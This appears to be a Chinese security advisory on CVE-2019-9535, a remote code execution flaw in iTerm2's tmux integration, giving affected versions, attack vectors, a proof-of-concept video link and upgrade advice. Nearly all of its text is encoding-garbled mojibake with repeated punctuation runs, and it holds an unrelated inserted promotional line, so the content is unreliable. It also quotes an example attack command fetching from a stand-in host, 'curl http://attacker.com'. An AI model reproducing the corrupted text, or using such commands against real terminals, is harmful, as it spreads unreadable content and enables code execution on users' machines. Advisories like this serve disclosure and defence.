iTerm2Ô¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-10-10

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-9535£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜÎó²îÓ°Ïì


Îó²î¸ÅÊö


iTerm2 ÊÇÈ«Çò×îÈÈÃŵÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬£¬£¬£¬ÊÇ¿ª·¢Ö°Ô±¾­³£Ê¹ÓÃµÄ MacOS Öն˹¤¾ß£¬£¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈÈÃÅ¿ªÔ´¹¤¾ßÌæ»»Æ·Ö®Ò»£¬£¬£¬£¬±»Ðí¶à¿ª·¢Ö°Ô±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£¡£¡£¡£¡£


iTerm2¹Ù·½Ðû²¼ÁËÇå¾²¸üÐÂÐÞ¸´ÁËÒ»¸öÖÁÉÙ±£´æ7ÄêµÄÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬£¬Õâ¸öÎó²îÔ´×Ô iTerm2 ÖÐµÄ tmux ¼¯ÀÖ³ÉÄÜ¡£¡£¡£¡£¡£¡£¡£Tumx Ó¦ÓóÌÐòÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬£¬£¬£¬¿ÉÔÊÐí´Óµ¥¸ö×°±¸½¨Éè²¢¿ØÖƶà¸öÖÕ¶Ë¡£¡£¡£¡£¡£¡£¡£


¹¥»÷Õß¿ÉÒÔÔÚÓû§µÄÖն˱¬·¢Êä³ö£¬£¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿°üÀ¨Í¨¹ý ssh ÅþÁ¬ÖÁ¶ñÒâЧÀÍÆ÷£¬£¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬£¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×Ù°üÀ¨Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£¡£¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£¡£¡£¡£¡£ÔÚÐí¶àÇéÐÎÏÂÄܹ»ÔÚÓû§ÅÌËã»úÉÏÖ´ÐÐÏÂÁî¡£¡£¡£¡£¡£¡£¡£


Îó²îÑéÖ¤


ÍâÑóµÄRadially Open SecurityÒѾ­·Å³öÎó²îʹÓÃÀֳɵÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£¡£¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÅþÁ¬µ½¶ñÒâ SSH ЧÀÍÆ÷Ö®ºó£¬£¬£¬£¬ÔÚ»úеÉÏÖ´Ðз­¿ªÒ»¸öÅÌËãÆ÷ÏÂÁîµÄPoC ÊÓÆµ¡£¡£¡£¡£¡£¡£¡£


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨



ÐÞ¸´½¨Òé


¹Ù·½ÒѾ­ÍƳöÇå¾²¸üУ¬£¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/